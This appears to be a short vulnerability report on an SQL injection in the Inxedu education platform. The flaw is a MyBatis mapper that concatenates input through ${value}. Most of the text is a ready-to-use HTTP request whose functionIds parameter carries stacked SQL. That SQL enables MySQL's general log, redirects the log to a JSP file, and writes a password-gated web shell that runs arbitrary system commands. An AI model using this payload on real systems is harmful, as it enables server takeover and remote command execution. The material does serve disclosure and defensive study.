代码拉取完成,页面将自动刷新
/inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/system/SysRoleMapper.xml
<insert id="createRoleFunction" parameterType="java.lang.String">
INSERT INTO SYS_ROLE_FUNCTION(<include refid="sys_role_function_column"/>)
VALUE ${value}
</insert>
/**
* 创建角色权限关联
* @param value
*/
public void createRoleFunction(String value);
We are about to see and access control
There is a problem with the test after finding the function point.
POST /admin/sysrole/saveroelfunction/2 HTTP/1.1
Host: 127.0.0.1:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 412
Origin: http://127.0.0.1:82
Connection: close
Referer: http://127.0.0.1:82/admin/sysrole/showroleList
Cookie: admin-token=; JSESSIONID=1DAA0E6A98BEA115043F997A0E41C476; inxeduweb_user_login_=6f5e7edc20b24ce180089526ceeb093f; inxedulogin_sys_user_=inxedulogin_sys_user_1
functionIds=61%2C62%2C80%2C81%2C30%2C32%2C79); set global general_log='on';
SET global general_log_file='/tmp/test.jsp';
SELECT '<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>';#
